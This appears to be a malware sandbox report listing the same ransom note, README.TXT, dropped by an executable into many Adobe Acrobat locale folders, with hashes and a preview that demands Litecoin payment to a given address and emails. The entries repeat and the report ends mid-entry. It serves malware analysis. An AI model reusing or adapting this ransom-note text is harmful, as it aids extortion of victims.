                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
